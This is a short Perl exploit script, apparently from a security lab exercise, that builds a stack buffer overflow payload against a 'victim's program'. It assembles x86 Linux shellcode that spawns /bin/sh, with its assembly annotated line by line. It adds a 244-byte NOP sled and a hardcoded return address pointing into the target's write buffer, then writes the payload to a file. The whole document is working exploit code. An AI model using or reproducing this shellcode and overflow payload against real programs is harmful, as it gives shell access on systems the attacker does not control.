#!/usr/bin/perl

# shellcode for spawning a new shell in victim's machine
my $shellcode =
"\x31\xc0".			# xorl		%eax, %eax
"\x50".				# pushl	%eax
"\x68\x6e\x2f\x73\x68".		# pushl        $0x68732f6e
"\x68\x2f\x2f\x62\x69".		# pushl	$0x69622f2f
"\x89\xe3" .			# movl         %esp, %ebx
"\x99".				# cltd
"\x52".				# pushl        %edx
"\x53".				# pushl        %ebx
"\x89\xe1".		        # movl         %esp, %ecx
"\xb0\x0b" .                    # movb         $0xb, %al
"\xcd\x80"                      # int          $0x80
;

# Address of the bottom of the stack = 0xBFFFF080
# Address of the writebuf = 0xbfffe990
# Offset between 2 addresses = 0x6f0
# This address must match the writebufs address */
my $retaddr = "\x90\xe9\xff\xbf";  #0xbfffe990

# Fill NOP instruction
my $pad = "\x90" x 244;

# Input string to our victim's program
my $arg = $pad.$shellcode.$retaddr;

# Let us store the input string to a file
open OUT, "> payload_divulge";
print OUT $arg;
close OUT;